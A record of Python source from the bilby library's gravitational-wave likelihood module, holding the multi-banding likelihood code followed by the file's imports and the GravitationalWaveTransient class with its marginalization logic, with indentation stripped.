which f - 1 / \sqrt(- d\tau / df) starts to decrease, because the bisection search of the starting
frequency does not work from that frequency. The stationary phase approximation is not valid at such
a high frequency, which can break down the approximation. It is calculated from the 0PN formula of
time-to-merger \tau(f). The user-specified frequency is used if it is lower than that frequency.
"""
fmax_tmp = (
(15 / 968)**(3 / 5) * (self.highest_mode / (2 * np.pi))**(8 / 5)
/ self.reference_chirp_mass_in_second
)
if maximum_banding_frequency is not None:
if isinstance(maximum_banding_frequency, int) or isinstance(maximum_banding_frequency, float):
if maximum_banding_frequency < fmax_tmp:
fmax_tmp = maximum_banding_frequency
else:
logger.warning("The input maximum_banding_frequency is too large."
"It is set to be {} Hz.".format(fmax_tmp))
else:
raise TypeError("maximum_banding_frequency must be a number")
self._maximum_banding_frequency = fmax_tmp
@property
def minimum_banding_duration(self):
return self._minimum_banding_duration
@minimum_banding_duration.setter
def minimum_banding_duration(self, minimum_banding_duration):
if isinstance(minimum_banding_duration, int) or isinstance(minimum_banding_duration, float):
self._minimum_banding_duration = minimum_banding_duration
else:
raise TypeError("minimum_banding_duration must be a number")
def setup_multibanding(self):
"""Set up frequency bands and coefficients needed for likelihood evaluations"""
self._setup_frequency_bands()
self._setup_integers()
self._setup_waveform_frequency_points()
self._setup_linear_coefficients()
if self.linear_interpolation:
self._setup_quadratic_coefficients_linear_interp()
else:
self._setup_quadratic_coefficients_ifft_fft()
def _tau(self, f):
"""Compute time-to-merger from the input frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
tau: float
time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return 5. / 256. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.)
def _dtaudf(self, f):
"""Compute the derivative of time-to-merger with respect to a starting frequency. This uses the 0PN formula.
Parameters
----------
f: float
input frequency
Returns
-------
dtaudf: float
derivative of time-to-merger
"""
f_22 = 2. * f / self.highest_mode
return -5. / 96. * self.reference_chirp_mass_in_second * \
(np.pi * self.reference_chirp_mass_in_second * f_22)**(-8. / 3.) / f
def _find_starting_frequency(self, duration, fnow):
"""Find the starting frequency of the next band satisfying (10) and
(51) of arXiv: 2104.07813.
Parameters
----------
duration: float
duration of the next band
fnow: float
starting frequency of the current band
Returns
-------
fnext: float or None
starting frequency of the next band. None if a frequency satisfying the conditions does not exist.
dfnext: float or None
frequency scale with which waveforms are smoothed. None if a frequency satisfying the conditions does not
exist.
"""
def _is_above_fnext(f):
"This function returns True if f > fnext"
cond1 = duration - self.time_offset - self._tau(f) - \
self.accuracy_factor * np.sqrt(-self._dtaudf(f)) > 0.
cond2 = f - 1. / np.sqrt(-self._dtaudf(f)) - fnow > 0.
return cond1 and cond2
# Bisection search for fnext
fmin, fmax = fnow, self.maximum_banding_frequency
if not _is_above_fnext(fmax):
return None, None
while fmax - fmin > 1e-2 / duration:
f = (fmin + fmax) / 2.
if _is_above_fnext(f):
fmax = f
else:
fmin = f
return f, 1. / np.sqrt(-self._dtaudf(f))
def _setup_frequency_bands(self):
"""Set up frequency bands. The durations of bands geometrically decrease T, T/2. T/4, ..., where T is the
original duration. This sets the following instance variables.
durations: durations of bands (T^(b) in the paper)
fb_dfb: the list of tuples, which contain starting frequencies (f^(b) in the paper) and frequency scales for
smoothing waveforms (\Delta f^(b) in the paper) of bands
"""
self.durations = [self.interferometers.duration]
self.fb_dfb = [(self.minimum_frequency, 0.)]
dnext = self.interferometers.duration / 2
while dnext > max(self.time_offset, self.minimum_banding_duration):
fnow, _ = self.fb_dfb[-1]
fnext, dfnext = self._find_starting_frequency(dnext, fnow)
if fnext is not None and fnext < min(self.maximum_frequency, self.maximum_banding_frequency):
self.durations.append(dnext)
self.fb_dfb.append((fnext, dfnext))
dnext /= 2
else:
break
self.fb_dfb.append((self.maximum_frequency + self.delta_f_end, self.delta_f_end))
logger.info("The total frequency range is divided into {} bands with frequency intervals of {}.".format(
len(self.durations), ", ".join(["1/{} Hz".format(d) for d in self.durations])))
def _setup_integers(self):
"""Set up integers needed for likelihood evaluations. This sets the following instance variables.
Nbs: the numbers of samples of downsampled data (N^(b) in the paper)
Mbs: the numbers of samples of shortened data (M^(b) in the paper)
Ks_Ke: start and end frequency indices of bands (K^(b)_s and K^(b)_e in the paper)
"""
self.Nbs = []
self.Mbs = []
self.Ks_Ke = []
for b in range(len(self.durations)):
dnow = self.durations[b]
fnow, dfnow = self.fb_dfb[b]
fnext, _ = self.fb_dfb[b + 1]
Nb = max(round_up_to_power_of_two(2. * (fnext * self.interferometers.duration + 1.)), 2**b)
self.Nbs.append(Nb)
self.Mbs.append(Nb // 2**b)
self.Ks_Ke.append((math.ceil((fnow - dfnow) * dnow), math.floor(fnext * dnow)))
def _setup_waveform_frequency_points(self):
"""Set up frequency points where waveforms are evaluated. Frequency points are reordered because some waveform
models raise an error if the input frequencies are not increasing. This adds frequency_points into the
waveform_arguments of waveform_generator. This sets the following instance variables.
banded_frequency_points: ndarray of total banded frequency points
start_end_idxs: list of tuples containing start and end indices of each band
unique_to_original_frequencies: indices converting unique frequency
points into the original duplicated banded frequencies
"""
self.banded_frequency_points = np.array([])
self.start_end_idxs = []
start_idx = 0
for i in range(len(self.fb_dfb) - 1):
d = self.durations[i]
Ks, Ke = self.Ks_Ke[i]
self.banded_frequency_points = np.append(self.banded_frequency_points, np.arange(Ks, Ke + 1) / d)
end_idx = start_idx + Ke - Ks
self.start_end_idxs.append((start_idx, end_idx))
start_idx = end_idx + 1
unique_frequencies, idxs = np.unique(self.banded_frequency_points, return_inverse=True)
self.waveform_generator.waveform_arguments['frequencies'] = unique_frequencies
self.unique_to_original_frequencies = idxs
logger.info("The number of frequency points where waveforms are evaluated is {}.".format(
len(unique_frequencies)))
logger.info("The speed-up gain of multi-banding is {}.".format(
(self.maximum_frequency - self.minimum_frequency) * self.interferometers.duration /
len(unique_frequencies)))
def _window(self, f, b):
"""Compute window function in the b-th band
Parameters
----------
f: float or ndarray
frequency at which the window function is computed
b: int
Returns
-------
window: float
window function at f
"""
fnow, dfnow = self.fb_dfb[b]
fnext, dfnext = self.fb_dfb[b + 1]
@np.vectorize
def _vectorized_window(f):
if fnow - dfnow < f < fnow:
return (1. + np.cos(np.pi * (f - fnow) / dfnow)) / 2.
elif fnow <= f <= fnext - dfnext:
return 1.
elif fnext - dfnext < f < fnext:
return (1. - np.cos(np.pi * (f - fnext) / dfnext)) / 2.
else:
return 0.
return _vectorized_window(f)
def _setup_linear_coefficients(self):
"""Set up coefficients by which waveforms are multiplied to compute (d, h)"""
self.linear_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
N = self.Nbs[-1]
for ifo in self.interferometers:
logger.info("Pre-computing linear coefficients for {}".format(ifo.name))
fddata = np.zeros(N // 2 + 1, dtype=complex)
fddata[:len(ifo.frequency_domain_strain)][ifo.frequency_mask] += \
ifo.frequency_domain_strain[ifo.frequency_mask] / ifo.power_spectral_density_array[ifo.frequency_mask]
for b in range(len(self.fb_dfb) - 1):
start_idx, end_idx = self.start_end_idxs[b]
windows = self._window(self.banded_frequency_points[start_idx:end_idx + 1], b)
fddata_in_ith_band = np.copy(fddata[:int(self.Nbs[b] / 2 + 1)])
fddata_in_ith_band[-1] = 0. # zeroing data at the Nyquist frequency
tddata = np.fft.irfft(fddata_in_ith_band)[-self.Mbs[b]:]
Ks, Ke = self.Ks_Ke[b]
fddata_in_ith_band = np.fft.rfft(tddata)[Ks:Ke + 1]
self.linear_coeffs[ifo.name] = np.append(
self.linear_coeffs[ifo.name], (4. / self.durations[b]) * windows * np.conj(fddata_in_ith_band))
def _setup_quadratic_coefficients_linear_interp(self):
"""Set up coefficients by which the squares of waveforms are multiplied to compute (h, h) for the
linear-interpolation algorithm"""
logger.info("Linear-interpolation algorithm is used for (h, h).")
self.quadratic_coeffs = dict((ifo.name, np.array([])) for ifo in self.interferometers)
N = self.Nbs[-1]
for ifo in self.interferometers:
logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
full_frequencies = np.arange(N // 2 + 1) / ifo.duration
full_inv_psds = np.zeros(N // 2 + 1)
full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = \
1. / ifo.power_spectral_density_array[ifo.frequency_mask]
for i in range(len(self.fb_dfb) - 1):
start_idx, end_idx = self.start_end_idxs[i]
banded_frequencies = self.banded_frequency_points[start_idx:end_idx + 1]
coeffs = np.zeros(len(banded_frequencies))
for k in range(len(coeffs) - 1):
if k == 0:
start_idx_in_sum = 0
else:
start_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k])
if k == len(coeffs) - 2:
end_idx_in_sum = len(full_frequencies) - 1
else:
end_idx_in_sum = math.ceil(ifo.duration * banded_frequencies[k + 1]) - 1
window_over_psd = full_inv_psds[start_idx_in_sum:end_idx_in_sum + 1] \
* self._window(full_frequencies[start_idx_in_sum:end_idx_in_sum + 1], i)
frequencies_in_sum = full_frequencies[start_idx_in_sum:end_idx_in_sum + 1]
coeffs[k] += 4. * self.durations[i] / ifo.duration * np.sum(
(banded_frequencies[k + 1] - frequencies_in_sum) * window_over_psd)
coeffs[k + 1] += 4. * self.durations[i] / ifo.duration \
* np.sum((frequencies_in_sum - banded_frequencies[k]) * window_over_psd)
self.quadratic_coeffs[ifo.name] = np.append(self.quadratic_coeffs[ifo.name], coeffs)
def _setup_quadratic_coefficients_ifft_fft(self):
"""Set up coefficients needed for the IFFT-FFT algorithm to compute (h, h)"""
logger.info("IFFT-FFT algorithm is used for (h, h).")
N = self.Nbs[-1]
# variables defined below correspond to \hat{N}^(b), \hat{T}^(b), \tilde{I}^(b)_{c, k}, h^(b)_{c, m} and
# \sqrt{w^(b)(f^(b)_k)} \tilde{h}(f^(b)_k) in the paper
Nhatbs = [min(2 * Mb, Nb) for Mb, Nb in zip(self.Mbs, self.Nbs)]
self.Tbhats = [self.interferometers.duration * Nbhat / Nb for Nb, Nbhat in zip(self.Nbs, Nhatbs)]
self.Ibcs = dict((ifo.name, []) for ifo in self.interferometers)
self.hbcs = dict((ifo.name, []) for ifo in self.interferometers)
self.wths = dict((ifo.name, []) for ifo in self.interferometers)
for ifo in self.interferometers:
logger.info("Pre-computing quadratic coefficients for {}".format(ifo.name))
full_inv_psds = np.zeros(N // 2 + 1)
full_inv_psds[:len(ifo.power_spectral_density_array)][ifo.frequency_mask] = 1. / \
ifo.power_spectral_density_array[ifo.frequency_mask]
for b in range(len(self.fb_dfb) - 1):
Imb = np.fft.irfft(full_inv_psds[:self.Nbs[b] // 2 + 1])
half_length = Nhatbs[b] // 2
Imbc = np.append(Imb[:half_length + 1], Imb[-(Nhatbs[b] - half_length - 1):])
self.Ibcs[ifo.name].append(np.fft.rfft(Imbc))
# Allocate arrays for IFFT-FFT operations
self.hbcs[ifo.name].append(np.zeros(Nhatbs[b]))
self.wths[ifo.name].append(np.zeros(self.Mbs[b] // 2 + 1, dtype=complex))
# precompute windows and their squares
self.windows = np.array([])
self.square_root_windows = np.array([])
for b in range(len(self.fb_dfb) - 1):
start, end = self.start_end_idxs[b]
ws = self._window(self.banded_frequency_points[start:end + 1], b)
self.windows = np.append(self.windows, ws)
self.square_root_windows = np.append(self.square_root_windows, np.sqrt(ws))
def calculate_snrs(self, waveform_polarizations, interferometer):
"""
Compute the snrs for multi-banding
Parameters
----------
waveform_polarizations: waveform
interferometer: bilby.gw.detector.Interferometer
Returns
-------
snrs: named tuple of snrs
"""
strain = np.zeros(len(self.banded_frequency_points), dtype=complex)
for mode in waveform_polarizations:
response = interferometer.antenna_response(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'], self.parameters['psi'],
mode
)
strain += waveform_polarizations[mode][self.unique_to_original_frequencies] * response
dt = interferometer.time_delay_from_geocenter(
self.parameters['ra'], self.parameters['dec'],
self.parameters['geocent_time'])
dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
ifo_time = dt_geocent + dt
calib_factor = interferometer.calibration_model.get_calibration_factor(
self.banded_frequency_points, prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
strain *= np.exp(-1j * 2. * np.pi * self.banded_frequency_points * ifo_time)
strain *= np.conjugate(calib_factor)
d_inner_h = np.dot(strain, self.linear_coeffs[interferometer.name])
if self.linear_interpolation:
optimal_snr_squared = np.vdot(
np.real(strain * np.conjugate(strain)),
self.quadratic_coeffs[interferometer.name]
)
else:
optimal_snr_squared = 0.
for b in range(len(self.fb_dfb) - 1):
Ks, Ke = self.Ks_Ke[b]
start_idx, end_idx = self.start_end_idxs[b]
Mb = self.Mbs[b]
if b == 0:
optimal_snr_squared += (4. / self.interferometers.duration) * np.vdot(
np.real(strain[start_idx:end_idx + 1] * np.conjugate(strain[start_idx:end_idx + 1])),
interferometer.frequency_mask[Ks:Ke + 1] * self.windows[start_idx:end_idx + 1]
/ interferometer.power_spectral_density_array[Ks:Ke + 1])
else:
self.wths[interferometer.name][b][Ks:Ke + 1] = self.square_root_windows[start_idx:end_idx + 1] \
* strain[start_idx:end_idx + 1]
self.hbcs[interferometer.name][b][-Mb:] = np.fft.irfft(self.wths[interferometer.name][b])
thbc = np.fft.rfft(self.hbcs[interferometer.name][b])
optimal_snr_squared += (4. / self.Tbhats[b]) * np.vdot(
np.real(thbc * np.conjugate(thbc)), self.Ibcs[interferometer.name][b])
complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
return self._CalculatedSNRs(
d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
complex_matched_filter_snr=complex_matched_filter_snr,
d_inner_h_squared_tc_array=None,
d_inner_h_array=None,
optimal_snr_squared_array=None)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance | bilby/gw/likelihood.py | import os
import json
import copy
import math
import attr
import numpy as np
import pandas as pd
from scipy.special import logsumexp
from ..core.likelihood import Likelihood
from ..core.utils import BilbyJsonEncoder, decode_bilby_json
from ..core.utils import (
logger, UnsortedInterp2d, create_frequency_series, create_time_series,
speed_of_light, solar_mass, radius_of_earth, gravitational_constant,
round_up_to_power_of_two)
from ..core.prior import Interped, Prior, Uniform, PriorDict, DeltaFunction
from .detector import InterferometerList, get_empty_interferometer, calibration
from .prior import BBHPriorDict, CBCPriorDict, Cosmological
from .source import lal_binary_black_hole
from .utils import (
noise_weighted_inner_product, build_roq_weights, zenith_azimuth_to_ra_dec,
ln_i0
)
from .waveform_generator import WaveformGenerator
class GravitationalWaveTransient(Likelihood):
""" A gravitational-wave transient likelihood object
This is the usual likelihood object to use for transient gravitational
wave parameter estimation. It computes the log-likelihood in the frequency
domain assuming a colored Gaussian noise model described by a power
spectral density. See Thrane & Talbot (2019), arxiv.org/abs/1809.02293.
Parameters
==========
interferometers: list, bilby.gw.detector.InterferometerList
A list of `bilby.detector.Interferometer` instances - contains the
detector data and power spectral densities
waveform_generator: `bilby.waveform_generator.WaveformGenerator`
An object which computes the frequency-domain strain of the signal,
given some set of parameters
distance_marginalization: bool, optional
If true, marginalize over distance in the likelihood.
This uses a look up table calculated at run time.
The distance prior is set to be a delta function at the minimum
distance allowed in the prior being marginalised over.
time_marginalization: bool, optional
If true, marginalize over time in the likelihood.
This uses a FFT to calculate the likelihood over a regularly spaced
grid.
In order to cover the whole space the prior is set to be uniform over
the spacing of the array of times.
If using time marginalisation and jitter_time is True a "jitter"
parameter is added to the prior which modifies the position of the
grid of times.
phase_marginalization: bool, optional
If true, marginalize over phase in the likelihood.
This is done analytically using a Bessel function.
The phase prior is set to be a delta function at phase=0.
calibration_marginalization: bool, optional
If true, marginalize over calibration response curves in the likelihood.
This is done numerically over a number of calibration response curve realizations.
priors: dict, optional
If given, used in the distance and phase marginalization.
Warning: when using marginalisation the dict is overwritten which will change the
the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
distance_marginalization_lookup_table: (dict, str), optional
If a dict, dictionary containing the lookup_table, distance_array,
(distance) prior_array, and reference_distance used to construct
the table.
If a string the name of a file containing these quantities.
The lookup table is stored after construction in either the
provided string or a default location:
'.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
calibration_lookup_table: dict, optional
If a dict, contains the arrays over which to marginalize for each interferometer or the filepaths of the
calibration files.
If not provided, but calibration_marginalization is used, then the appropriate file is created to
contain the curves.
number_of_response_curves: int, optional
Number of curves from the calibration lookup table to use.
Default is 1000.
starting_index: int, optional
Sets the index for the first realization of the calibration curve to be considered.
This, coupled with number_of_response_curves, allows for restricting the set of curves used. This can be used
when dealing with large frequency arrays to split the calculation into sections.
Defaults to 0.
jitter_time: bool, optional
Whether to introduce a `time_jitter` parameter. This avoids either
missing the likelihood peak, or introducing biases in the
reconstructed time posterior due to an insufficient sampling frequency.
Default is False, however using this parameter is strongly encouraged.
reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
Definition of the reference frame for the sky location.
- :code:`sky`: sample in RA/dec, this is the default
- e.g., :code:`"H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"])`:
sample in azimuth and zenith, `azimuth` and `zenith` defined in the
frame where the z-axis is aligned the the vector connecting H1
and L1.
time_reference: str, optional
Name of the reference for the sampled time parameter.
- :code:`geocent`/:code:`geocenter`: sample in the time at the
Earth's center, this is the default
- e.g., :code:`H1`: sample in the time of arrival at H1
Returns
=======
Likelihood: `bilby.core.likelihood.Likelihood`
A likelihood object, able to compute the likelihood of the data given
some model parameters
"""
@attr.s
class _CalculatedSNRs:
d_inner_h = attr.ib()
optimal_snr_squared = attr.ib()
complex_matched_filter_snr = attr.ib()
d_inner_h_array = attr.ib()
optimal_snr_squared_array = attr.ib()
d_inner_h_squared_tc_array = attr.ib()
def __init__(
self, interferometers, waveform_generator, time_marginalization=False,
distance_marginalization=False, phase_marginalization=False, calibration_marginalization=False, priors=None,
distance_marginalization_lookup_table=None, calibration_lookup_table=None,
number_of_response_curves=1000, starting_index=0, jitter_time=True, reference_frame="sky",
time_reference="geocenter"
):
self.waveform_generator = waveform_generator
super(GravitationalWaveTransient, self).__init__(dict())
self.interferometers = InterferometerList(interferometers)
self.time_marginalization = time_marginalization
self.distance_marginalization = distance_marginalization
self.phase_marginalization = phase_marginalization
self.calibration_marginalization = calibration_marginalization
self.priors = priors
self._check_set_duration_and_sampling_frequency_of_waveform_generator()
self.jitter_time = jitter_time
self.reference_frame = reference_frame
if "geocent" not in time_reference:
self.time_reference = time_reference
self.reference_ifo = get_empty_interferometer(self.time_reference)
if self.time_marginalization:
logger.info("Cannot marginalise over non-geocenter time.")
self.time_marginalization = False
self.jitter_time = False
else:
self.time_reference = "geocent"
self.reference_ifo = None
if self.time_marginalization:
self._check_marginalized_prior_is_set(key='geocent_time')
self._setup_time_marginalization()
priors['geocent_time'] = float(self.interferometers.start_time)
if self.jitter_time:
priors['time_jitter'] = Uniform(
minimum=- self._delta_tc / 2,
maximum=self._delta_tc / 2,
boundary='periodic',
name="time_jitter",
latex_label="$t_j$"
)
self._marginalized_parameters.append('geocent_time')
elif self.jitter_time:
logger.debug(
"Time jittering requested with non-time-marginalised "
"likelihood, ignoring.")
self.jitter_time = False
if self.phase_marginalization:
self._check_marginalized_prior_is_set(key='phase')
priors['phase'] = float(0)
self._marginalized_parameters.append('phase')
if self.distance_marginalization:
self._lookup_table_filename = None
self._check_marginalized_prior_is_set(key='luminosity_distance')
self._distance_array = np.linspace(
self.priors['luminosity_distance'].minimum,
self.priors['luminosity_distance'].maximum, int(1e4))
self.distance_prior_array = np.array(
[self.priors['luminosity_distance'].prob(distance)
for distance in self._distance_array])
self._ref_dist = self.priors['luminosity_distance'].rescale(0.5)
self._setup_distance_marginalization(
distance_marginalization_lookup_table)
for key in ['redshift', 'comoving_distance']:
if key in priors:
del priors[key]
priors['luminosity_distance'] = float(self._ref_dist)
self._marginalized_parameters.append('luminosity_distance')
if self.calibration_marginalization:
self.number_of_response_curves = number_of_response_curves
self.starting_index = starting_index
self._setup_calibration_marginalization(calibration_lookup_table)
self._marginalized_parameters.append('recalib_index')
def __repr__(self):
return self.__class__.__name__ + '(interferometers={},\n\twaveform_generator={},\n\ttime_marginalization={}, ' \
'distance_marginalization={}, phase_marginalization={}, '\
'calibration_marginalization={}, priors={})'\
.format(self.interferometers, self.waveform_generator, self.time_marginalization,
self.distance_marginalization, self.phase_marginalization, self.calibration_marginalization,
self.priors)
def _check_set_duration_and_sampling_frequency_of_waveform_generator(self):
""" Check the waveform_generator has the same duration and
sampling_frequency as the interferometers. If they are unset, then
set them, if they differ, raise an error
"""
attributes = ['duration', 'sampling_frequency', 'start_time']
for attribute in attributes:
wfg_attr = getattr(self.waveform_generator, attribute)
ifo_attr = getattr(self.interferometers, attribute)
if wfg_attr is None:
logger.debug(
"The waveform_generator {} is None. Setting from the "
"provided interferometers.".format(attribute))
elif wfg_attr != ifo_attr:
logger.debug(
"The waveform_generator {} is not equal to that of the "
"provided interferometers. Overwriting the "
"waveform_generator.".format(attribute))
setattr(self.waveform_generator, attribute, ifo_attr)
def calculate_snrs(self, waveform_polarizations, interferometer):
"""
Compute the snrs
Parameters
==========
waveform_polarizations: dict
A dictionary of waveform polarizations and the corresponding array
interferometer: bilby.gw.detector.Interferometer
The bilby interferometer object
"""
signal = interferometer.get_detector_response(
waveform_polarizations, self.parameters)
_mask = interferometer.frequency_mask
if 'recalib_index' in self.parameters:
signal[_mask] *= self.calibration_draws[interferometer.name][int(self.parameters['recalib_index'])]
d_inner_h = interferometer.inner_product(signal=signal)
optimal_snr_squared = interferometer.optimal_snr_squared(signal=signal)
complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
d_inner_h_array = None
optimal_snr_squared_array = None
if self.time_marginalization and self.calibration_marginalization:
d_inner_h_integrand = np.tile(
interferometer.frequency_domain_strain.conjugate() * signal /
interferometer.power_spectral_density_array, (self.number_of_response_curves, 1)).T
d_inner_h_integrand[_mask] *= self.calibration_draws[interferometer.name].T
d_inner_h_array =\
4 / self.waveform_generator.duration * np.fft.fft(
d_inner_h_integrand[0:-1], axis=0).T
optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
np.abs(signal)**2 / interferometer.power_spectral_density_array
optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
self.calibration_abs_draws[interferometer.name].T)
elif self.time_marginalization and not self.calibration_marginalization:
d_inner_h_array =\
4 / self.waveform_generator.duration * np.fft.fft(
signal[0:-1] *
interferometer.frequency_domain_strain.conjugate()[0:-1] /
interferometer.power_spectral_density_array[0:-1])
elif self.calibration_marginalization and ('recalib_index' not in self.parameters):
d_inner_h_integrand = 4. / self.waveform_generator.duration * \
interferometer.frequency_domain_strain.conjugate() * signal / \
interferometer.power_spectral_density_array
d_inner_h_array = np.dot(d_inner_h_integrand[_mask], self.calibration_draws[interferometer.name].T)
optimal_snr_squared_integrand = 4. / self.waveform_generator.duration *\
np.abs(signal)**2 / interferometer.power_spectral_density_array
optimal_snr_squared_array = np.dot(optimal_snr_squared_integrand[_mask],
self.calibration_abs_draws[interferometer.name].T)
return self._CalculatedSNRs(
d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
complex_matched_filter_snr=complex_matched_filter_snr,
d_inner_h_array=d_inner_h_array,
optimal_snr_squared_array=optimal_snr_squared_array,
d_inner_h_squared_tc_array=None)
def _check_marginalized_prior_is_set(self, key):
if key in self.priors and self.priors[key].is_fixed:
raise ValueError(
"Cannot use marginalized likelihood for {}: prior is fixed"
.format(key))
if key not in self.priors or not isinstance(
self.priors[key], Prior):
logger.warning(
'Prior not provided for {}, using the BBH default.'.format(key))
if key == 'geocent_time':
self.priors[key] = Uniform(
self.interferometers.start_time,
self.interferometers.start_time + self.interferometers.duration)
elif key == 'luminosity_distance':
for key in ['redshift', 'comoving_distance']:
if key in self.priors:
if not isinstance(self.priors[key], Cosmological):
raise TypeError(
"To marginalize over {}, the prior must be specified as a "
"subclass of bilby.gw.prior.Cosmological.".format(key)
)
self.priors['luminosity_distance'] = self.priors[key].get_corresponding_prior(
'luminosity_distance'
)
del self.priors[key]
else:
self.priors[key] = BBHPriorDict()[key]
@property
def priors(self):
return self._prior
@priors.setter
def priors(self, priors):
if priors is not None:
self._prior = priors.copy()
elif any([self.time_marginalization, self.phase_marginalization,
self.distance_marginalization]):
raise ValueError("You can't use a marginalized likelihood without specifying a priors")
else:
self._prior = None
def noise_log_likelihood(self):
log_l = 0
for interferometer in self.interferometers:
mask = interferometer.frequency_mask
log_l -= noise_weighted_inner_product(
interferometer.frequency_domain_strain[mask],
interferometer.frequency_domain_strain[mask],
interferometer.power_spectral_density_array[mask],
self.waveform_generator.duration) / 2
return float(np.real(log_l))
def log_likelihood_ratio(self):
waveform_polarizations =\
self.waveform_generator.frequency_domain_strain(self.parameters)
self.parameters.update(self.get_sky_frame_parameters())
if waveform_polarizations is None:
return np.nan_to_num(-np.inf)
d_inner_h = 0.
optimal_snr_squared = 0.
complex_matched_filter_snr = 0.
if self.time_marginalization and self.calibration_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
(self.number_of_response_curves, len(self.interferometers.frequency_array[0:-1])),
dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
elif self.time_marginalization:
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
d_inner_h_array = np.zeros(
len(self.interferometers.frequency_array[0:-1]),
dtype=np.complex128)
elif self.calibration_marginalization:
d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
waveform_polarizations=waveform_polarizations,
interferometer=interferometer)
d_inner_h += per_detector_snr.d_inner_h
optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
if self.time_marginalization or self.calibration_marginalization:
d_inner_h_array += per_detector_snr.d_inner_h_array
if self.calibration_marginalization:
optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
if self.calibration_marginalization and self.time_marginalization:
log_l = self.time_and_calibration_marginalized_likelihood(
d_inner_h_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.calibration_marginalization:
log_l = self.calibration_marginalized_likelihood(
d_inner_h_calibration_array=d_inner_h_array,
h_inner_h=optimal_snr_squared_array)
elif self.time_marginalization:
log_l = self.time_marginalized_likelihood(
d_inner_h_tc_array=d_inner_h_array,
h_inner_h=optimal_snr_squared)
if self.jitter_time:
self.parameters['geocent_time'] -= self.parameters['time_jitter']
elif self.distance_marginalization:
log_l = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
elif self.phase_marginalization:
log_l = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h, h_inner_h=optimal_snr_squared)
else:
log_l = np.real(d_inner_h) - optimal_snr_squared / 2
return float(log_l.real)
def generate_posterior_sample_from_marginalized_likelihood(self):
"""
Reconstruct the distance posterior from a run which used a likelihood
which explicitly marginalised over time/distance/phase.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Returns
=======
sample: dict
Returns the parameters with new samples.
Notes
=====
This involves a deepcopy of the signal to avoid issues with waveform
caching, as the signal is overwritten in place.
"""
if any([self.phase_marginalization, self.distance_marginalization,
self.time_marginalization, self.calibration_marginalization]):
signal_polarizations = copy.deepcopy(
self.waveform_generator.frequency_domain_strain(
self.parameters))
else:
return self.parameters
if self.calibration_marginalization and self.time_marginalization:
raise AttributeError(
"Cannot use time and calibration marginalization simultaneously for regeneration at the moment!"
"The matrix manipulation has not been tested.")
if self.calibration_marginalization:
new_calibration = self.generate_calibration_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['recalib_index'] = new_calibration
if self.time_marginalization:
new_time = self.generate_time_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['geocent_time'] = new_time
if self.distance_marginalization:
new_distance = self.generate_distance_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['luminosity_distance'] = new_distance
if self.phase_marginalization:
new_phase = self.generate_phase_sample_from_marginalized_likelihood(
signal_polarizations=signal_polarizations)
self.parameters['phase'] = new_phase
return self.parameters.copy()
def generate_calibration_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for the set of calibration response curves when
explicitly marginalizing over the calibration uncertainty.
Parameters
----------
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
-------
new_calibration: dict
Sample set from the calibration posterior
"""
if 'recalib_index' in self.parameters:
self.parameters.pop('recalib_index')
self.parameters.update(self.get_sky_frame_parameters())
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
log_like = self.get_calibration_log_likelihoods(signal_polarizations=signal_polarizations)
calibration_post = np.exp(log_like - max(log_like))
calibration_post /= np.sum(calibration_post)
new_calibration = np.random.choice(self.number_of_response_curves, p=calibration_post)
return new_calibration
def generate_time_sample_from_marginalized_likelihood(
self, signal_polarizations=None):
"""
Generate a single sample from the posterior distribution for coalescence
time when using a likelihood which explicitly marginalises over time.
In order to resolve the posterior we artificially upsample to 16kHz.
See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
Parameters
==========
signal_polarizations: dict, optional
Polarizations modes of the template.
Returns
=======
new_time: float
Sample from the time posterior.
"""
self.parameters.update(self.get_sky_frame_parameters())
if self.jitter_time:
self.parameters['geocent_time'] += self.parameters['time_jitter']
if signal_polarizations is None:
signal_polarizations = \
self.waveform_generator.frequency_domain_strain(self.parameters)
